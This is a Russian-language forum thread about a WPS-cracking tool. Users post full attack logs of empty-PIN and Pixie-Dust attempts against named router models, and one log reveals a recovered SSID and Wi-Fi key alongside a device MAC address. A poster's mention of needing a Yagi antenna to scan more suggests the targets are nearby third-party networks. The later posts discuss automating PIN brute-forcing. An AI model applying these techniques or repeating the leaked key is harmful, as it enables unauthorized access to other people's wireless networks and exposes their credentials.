Это я знаю) спасибо ) я к тому что в базе к одной точке есть по несколько паролей, а отображается только один
RTL8671 по идее должен прокатывать алгоритм с пустым PIN, но такое впечатление что заблокирован перебор. На GPON ZTE F660, EAP сессия сбрасывается после M2, но там ошибка: (-) Unknown error 0000. Spoiler: лог сессии Wireless Audit Companion [*] Audit started. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 5829F54B2AA73C25495DB703279A4B96 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Manufacturer: Realtek Semiconductor Corp. [*] Model Name: RTL8671 [*] Model Number: EV-2006-07-27 [*] Serial Number: 123456789012347 [*] Device Name: Internet Router Device [*] Sending WPS Message M2... [*] R-Nonce: 859B608716A0F2B7A9BE27BCDB01BE68 [*] PKR: 13E082ED9034111B127D49AE9FA3D33F3C7BD2BA9DA4ED486B60C45AFCDDE2E9E141FB769DD77C6AE253CFC3333715599B0BEDFF66C0BBF54D429AD882CA4B03A77477D591ED06A432D509C611B9B309747550F138A8FDF36639D1733C6720BDB6E9DEE322795DA2EAB1A0984812DEAEF30257B897D9F224C3D68AF468B7B2980C7406428388CFEBA8528B5CD5D3C199F49E72BC5D7A93C14E0E92B436F9916DE0CC39C6793CAEADF89ECCE1DD438BB545E5EE5D12C73E342A99B01911F849E2 [*] AuthKey: F00B83591BA9256E4E99E4032BB6260ED07B3C667CB08BEDD1C919C38ADDC25D [*] Received WSC NACK. [-] Unknown error 000B. [*] Sending WSC NACK... [*] EAP session closed. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 5979668F313C642D73D4DF9B1CA47486 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Sending WPS Message M2... [*] R-Nonce: 2FC38B5CB8F8C0FF64145482A4B4309B [*] PKR: AC67897FBE661FB9396B7CB672E4254D8CED1CEFAFA4EBD9A84FF5619DFE8996A99EE81681AA3AB2C0DB6F3AC9DC03F0F72B47005FFA5E327790CC35AAB420C7A447827393047ADE9648C1D009ECB0E159590CCD50CFB42395CAC6B55F14698747E25EF961448FFB768DA8B7A8118FAB3CE5181F64C22F8B11593943B9351E2E5D36173DBB7ABC87977F83857C441BB866B3C4865CF7E9A576F837F32C6D496E4FBC380F558B3D1BA68878789FB6D4CF4AE3AD8B86BCD039E607989D9566665C [*] AuthKey: 7FA28EC0F50F77359BFCB3993471C5ECF5F1D9A91264B197ED37EFF48E5AFDF1 [*] Received WSC NACK. [-] Unknown error 000B. [*] Sending WSC NACK... [*] EAP session closed. [*] Associating with AP... [*] Audit stopped.
Не всегда и не везде. ANUS DSL-N10E неуязвим. Spoiler: 111 [*] Audit started. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 0000054900003215000068E800006EF6 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Manufacturer: Realtek Semiconductor Corp. [*] Model Name: ADSL Router [*] Model Number: EV-2006-07-27 [*] Serial Number: 123456789012347 [*] Device Name: ADSL Router/Modem IGD [*] Sending WPS Message M2... [*] R-Nonce: 667EF5C0EF2DBC567598BC4E2BB43925 [*] PKR: D4970C4AF53F62ADD84844A39204EACA280A4E307FF93BDE1FE795869CB90B0202A3F94D164592BFB3508125C7E281F81C5CFFDEF29AF6AE3C9BF0310D34CFE4B59CD6138B1228807164306EA7347756B68F030A74CD94BC60702F1130F835E8B74C59E7E72FA0951B86F6761B174B598A699CFB9E279699FFDE1FEA9EA8A08156171C16A0E9757B44B4A262D8F44FE550CE12991AF06556E22A4B7339644E9CBE29373F93F801B38EE72DFA53677E8779BAF9899179A0CA56C2D17B701B0C75 [*] AuthKey: 3F3303AC6584CDA3A9DDFE54CEA197CBEF3D23B2D4B24A5015CD00DD9C929F8A [*] Received WPS Message M3. [*] E-Hash1: 3B8173FFB0BE32F3DC3338CE99ADC76DC89B39B02BB4B7176D8B5F3D79F98F5F [*] E-Hash2: BFEB10CE495FFE856F7AE78FE88B8895070E538FD4C6D939169BB83ECA125197 [*] Sending WPS Message M4... [*] Received WSC NACK. [-] Error: Wrong PIN code. [*] Sending WSC NACK... [*] EAP session closed. [*] Audit stopped.
Печалька. Ещё один из иследованных на уязвимость пустого PIN, D-Link DIR-620 MAC: EC:22:80:FA:AD:61. Больше просканировать не смогу, нужно антенну менять на Yagi или сменить текущее местоположение. Spoiler: Последовательность работы PixieWps [*] Audit started. [*] Associating with AP... [+] Associated successfully. [*] Trying pin ""... [*] Sending EAPOL Start... [*] Received Identity Request. [*] Sending Identity Response... [*] Received WPS Message M1. [*] E-Nonce: 660C0DFF12F9BDC677A0E6BE2BD66B76 [*] PKE: D0141B15656E96B85FCEAD2E8E76330D2B1AC1576BB026E7A328C0E1BAF8CF91664371174C08EE12EC92B0519C54879F21255BE5A8770E1FA1880470EF423C90E34D7847A6FCB4924563D1AF1DB0C481EAD9852C519BF1DD429C163951CF69181B132AEA2A3684CAF35BC54ACA1B20C88BB3B7339FF7D56E09139D77F0AC58079097938251DBBE75E86715CC6B7C0CA945FA8DD8D661BEB73B414032798DADEE32B5DD61BF105F18D89217760B75C5D966A5A490472CEBA9E3B4224F3D89FB2B [*] Manufacturer: D-Link Systems [*] Model Name: DIR-620 [*] Model Number: DIR-620 [*] Serial Number: 123456789012347 [*] Device Name: DIR-620 [*] Sending WPS Message M2... [*] R-Nonce: 5BEF3FD53F7533978E4D619760F93935 [*] PKR: 72EEEDCB5B4D40FEBB4C5CCC6DD6B8EA522FE1D3907CCABDBC8B664E2F259324702718068AAD99CE57EA3C12A6D5F0008197D3A7FED3F43D1F564EC4E22A09BE9C7C3F688645E37F54F784BEAC28ED0BC47EF3714AFE0ADD5F4C4F61F14A4C31E5902C310858DB07F0C9AE08DA14A0159FDE51A3D8C19F936B96C8F61F506C652EF0D1366A40B969FC891059DCD96F9CB5D629FF55650319BBD64E7AE8A4858B82D9D55D8B91E83189C927C51E5F06F2FACFE264DFEC6CD0C5A0241ABA384754 [*] AuthKey: 1AE8737538B55CF224442E4ACC0303B67C7755919B63623FF602BA59FB21C855 [*] Received WPS Message M3. [*] E-Hash1: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC [*] E-Hash2: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC [*] Sending WPS Message M4... [*] Received WPS Message M3. [*] E-Hash1: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC [*] E-Hash2: FE0F3F47602EE04D7805670A256EFE14CB3BF7806F2013FBE54E2812FC9541DC [*] Received WPS Message M5. [+] First half found: <empty> [*] Sending WPS Message M6... [*] Received WPS Message M7. [*] Sending WSC NACK... [*] EAP session closed. [+] WPS PIN: <empty> [+] SSID: onlime_100 [+] Key: 9661108807 [+] Key Index: 1 [*] Audit stopped.
Всем привет.ADSL Modem/Router ZTE ZXHN H108N наконец-то поддался ,как и предполагали,пустой PIN(<empty>) Сработала ночная сборка ! С КАЛИ так и не смог добиться результата,но отношу это к кривизне своих ручек.
Подтверждаю ZXNH H118N успешно сдался, DIR-825AC пока не поддаётся, возможно из за не стабильного сигнала.
binarymaster, не совсем очевидно, что из wps генератора пины автоматом переносятся в брут. Может пункт в меню на кнопке Море сделать?
Какой именно пункт? По-моему всё вполне очевидно, эта интеграция изначально была задумана, чтобы нажимать меньше кнопок, доводя всё до автоматизма. Причём, список пинов переносится, только если генератору была задана целевая (выбранная в target) сеть.
Это была регрессия, спасибо! Поправил. А всё потому, что почти у каждой модели Linksys веб интерфейс похож лишь внешне, внутренности полностью отличаются (пути страниц, сигнатуры, и т.п.)
Поддерживаю. Когда "великолепный робот"("тупой", известный, повторяющийся алгоритм) высвобождает человека для творчества(нового поиска).. Ни фига плохого в этом нет. Автоматические-рутинные-повторяющиеся операции, удел роботов/машин/инструментов. И пусть так будет вечно. Думаю, нужно определить кодекс, насколько машины(II) должны за нас думать.
Ну не знаю, Generate all wps, например. Ну чтобы лишний раз в генератор не заходить, и по этому пункту будут генерироваться все пины. Как раз автоматизма больше будет. Или даже пункт с галочкой, чтобы для каждой сети пины брались не из листа, а генерировались автоматом.
А, в этом смысле... но тут я сталкиваюсь с тем, что генератора два - встроенный и онлайновый, и дублировать пункты главного меню совсем не хочется, тем более есть горячие клавиши (Ctrl+W / Alt+W). Соглашусь с тем, что смена фокуса с формы аудита на основную, и выбор сети в таблице, отнимает некоторое время. Думаю, компромиссным вариантом будет обработка этих же горячих клавиш на форме аудита.
А если, ну как вариант... Радиокнопки они же несут чисто информативную нагрузку. Вот если их изменить для онлайн и офлайн генератора? Т.е. без окна генератора, а сразу из памяти пины берутся или заносятся в лист, для наглядности. И еще небольшой реквест. Удобно было бы, если на форме был прогресс бар или в окне статуса показывались проценты. А то так закинешь пачку пинов и не знаешь. Тут вылез небольшой баг - уровень сигнала в окне аудита не всегда сразу показывает нужный уровень, надо несколько раз аудит попытаться запустить чтобы заработало.
Нет, их менять не хочу, пусть так останутся. Это имеет отношение к тому, что я предложил выше. Это можно, скорее будут проценты, как в reaver. Уровень сигнала обновляется по мере обновления данных в таблице. Если сканирование сетей отключено, значение обновляться не будет (точнее будет, но другим способом, не самым точным).
